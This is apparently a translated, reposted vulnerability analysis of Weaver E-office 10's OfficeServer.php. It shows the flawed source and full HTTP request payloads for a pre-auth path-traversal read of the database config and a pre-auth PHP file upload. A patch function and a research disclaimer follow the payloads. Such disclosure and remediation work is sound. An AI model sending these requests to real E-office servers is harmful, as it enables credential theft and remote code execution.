Weaver (泛微) E-office 10 OfficeServer.php Download + Upload Vulnerability Analysis

admin, 2024-08-18 21:31:49

0x00 Preface

Setting up the environment does not take long, and installation is a single step. Weaver E-office V10 is IonCube-encoded, so I spent quite a while looking for an IonCube decoder and eventually found an online decoding feature on P神's Knowledge Planet (星球) site.

Weaver V10 installer: https://pan.baidu.com/s/1SxunVTkpEq4BEzSVB0YSpA (extraction code: 1994)


Weaver E-office V10 is built on the Laravel Lumen framework, so it also inherits the Laravel framework's deserialization vulnerabilities.

The directory layout is the usual Lumen one:

- app: core application source
- bootstrap: framework bootstrap files, including app.php
- config: configuration files
- database: database files
- ext: extensions
- nodejs: JavaScript files
- public: contains index.php, the request entry point into the application
- resources: views and uncompiled resource files
- routes: route definitions, containing web.php (some applications also have api.php, console.php, etc.)
- storage: directory-based templates, files and caches generated by the Blade framework
- vendor: Composer dependencies

0x01 Pre-auth Arbitrary File Download

In fact, /eoffice10/server/public/iWebOffice2015/OfficeServer.php contains a very obvious arbitrary file read: setting mOption (the OPTION field of the FormData JSON) to LOADFILE is enough to read any file, because the FILENAME field is concatenated onto the Document directory without any sanitisation.

<?php
switch ($mOption) {
    case "LOADFILE":
        $mRecordID = $de_json["RECORDID"];
        $mFileName = $de_json["FILENAME"];
        $mFileType = $de_json["FILETYPE"];
        // FILENAME is taken from the request as-is: "../" sequences escape /Document/
        $mFilePath = $mFilePath . "/Document/" . $mFileName;
        error_log($mFilePath, 3, "a.log");
        $result = file_exists($mFilePath);
        if ($result) {
            $fd = fopen($mFilePath, "rb");
            $mFileSize = filesize($mFilePath);
            $mFileBody = fread($fd, $mFileSize);
            header("Content-type: application/x-msdownload");
            header("Content-Length:" . $mFileSize);
            header("Content-Disposition: attachment; filename=" . $mFileName);
            ob_clean();
            flush();
            echo $mFileBody;   // the raw file contents are returned to an unauthenticated caller
            fclose($fd);
        } else {
            echo header("MsgError:404");
        }
        break;

Payload (reads the database configuration file):

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 225
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypHokEOoPMlNZHatM
Host: 127.0.0.1:8010
Origin: http://127.0.0.1:8010
Referer: http://127.0.0.1:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition:form-data;name="FormData"

{'RECORDID':'undefined','OPTION':'LOADFILE','FILENAME':'../../../config/database.php'}
------WebKitFormBoundaryLpoiBFy4ANA8daew--

The downloaded file is likewise IonCube-encoded; once decoded, the database username and password are visible.

0x02 Pre-auth Arbitrary File Upload

In the same file, /eoffice10/server/public/iWebOffice2015/OfficeServer.php, move_uploaded_file writes the uploaded file into the /Document/ directory with no authentication at all, which is what creates the vulnerability.

<?php
......
$FormData = $_REQUEST["FormData"];
error_log($FormData, 3, "a.log");
$data1 = iconv("GB2312", "UTF-8//IGNORE", $FormData);
$data1 = str_replace("'", "\"", $data1);   // single quotes become double quotes so the JSON parses
$de_json = json_decode($data1, true);
$mOption = $de_json["OPTION"];             // attacker-controlled; no session or permission check precedes it
switch ($mOption) {
    ...
    case "SAVEFILE":
        $mRecordID = $de_json["RECORDID"];
        $mFileName = $de_json["FILENAME"];
        $mFileType = $de_json["FILETYPE"];
        $mUserName = $de_json["USERNAME"];
        $mFile = $_FILES["FileData"]["tmp_name"];
        error_log($mFile, 3, "a.log");
        // FILENAME, including its extension, is used unsanitised as the destination path
        $mFilePath = $mFilePath . "/Document/" . $mFileName;
        error_log($mFilePath, 3, "a.log");
        if (is_uploaded_file($mFile)) {
            if (move_uploaded_file($mFile, $mFilePath)) {
                $mFileSize = $_FILES["FileData"]["size"];
                $result = true;
            } else {
                $MsgError = "保存失败!";
                $result = false;
            }
        } else {
            $MsgError = "Uploaded_file Error";
            $result = false;
        }
        break;
    ...
}
?>

Payload:

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 410
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBHpS0kA1AXWpICh2
Host: 127.0.0.1:8010
Origin: http://127.0.0.1:8010
Referer: http://127.0.0.1:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition:form-data;name="FileData";filename="fuck.php"
Content-Type:application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition:form-data;name="FormData"

{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'fuck.php'}
------WebKitFormBoundaryLpoiBFy4ANA8daew--

The response after sending the request is blank, but the file has in fact been written; it can be reached at /eoffice10/server/public/iWebOffice2015/Document/fuck.php.
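Both branches above share the same root cause: a request-supplied FILENAME concatenated straight onto the Document directory, with no login check in front of it. The following function is an added hardening example written for this analysis, not Weaver's code; the name resolveDocumentPath, the $documentDir parameter and the extension allow-list are assumptions, and it targets PHP 7.1 or later.

```php
<?php
// Added hardening example, not Weaver's code. Replaces the raw
//   $mFilePath = $mFilePath . "/Document/" . $mFileName;
// concatenation used by both LOADFILE and SAVEFILE in OfficeServer.php.
// Assumptions: $documentDir is the absolute Document directory; the
// extension allow-list is illustrative and must be tuned to the product.

const ALLOWED_EXTENSIONS = ['doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'pdf', 'wps'];

/**
 * Resolve a client-supplied FILENAME to a path inside $documentDir, or return
 * null when it would escape the directory or carry an executable extension.
 */
function resolveDocumentPath(string $documentDir, string $fileName): ?string
{
    // NUL bytes truncate paths at the C level; refuse them outright.
    if (strpos($fileName, "\0") !== false) {
        return null;
    }
    // Keep only the last path segment (handles both / and \ separators),
    // which neutralises ../../../config/database.php style traversal.
    $base = basename(str_replace('\\', '/', $fileName));
    if ($base === '' || $base === '.' || $base === '..') {
        return null;
    }
    // Extension allow-list stops SAVEFILE from writing a .php/.phtml file.
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Canonicalise the root and verify the final path still lies under it
    // (this also rejects a symlink inside Document that points elsewhere).
    $root = realpath($documentDir);
    if ($root === false) {
        return null;
    }
    $candidate = $root . DIRECTORY_SEPARATOR . $base;
    $resolved = realpath($candidate);               // false if not created yet (SAVEFILE)
    $final = $resolved === false ? $candidate : $resolved;
    if (strpos($final, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $final;
}

// Usage inside OfficeServer.php: both branches must first require a login,
// e.g. if (empty($_SESSION['user_id'])) { http_response_code(401); exit; }
// then: $mFilePath = resolveDocumentPath($mFilePath . '/Document', $de_json['FILENAME']);
//       if ($mFilePath === null) { http_response_code(400); exit; }
```

The allow-list does not by itself cover multi-extension handlers (for example an Apache AddHandler rule that executes name.php.doc), so script execution should additionally be disabled for the Document directory at the web-server level.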


Originally published on the WeChat public account 星悦安全: (Nday) Weaver E-office 10 OfficeServer.php Download + Upload Vulnerability Analysis

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Reposted on CN-SEC中文网: https://cn-sec.com/archives/3077237.html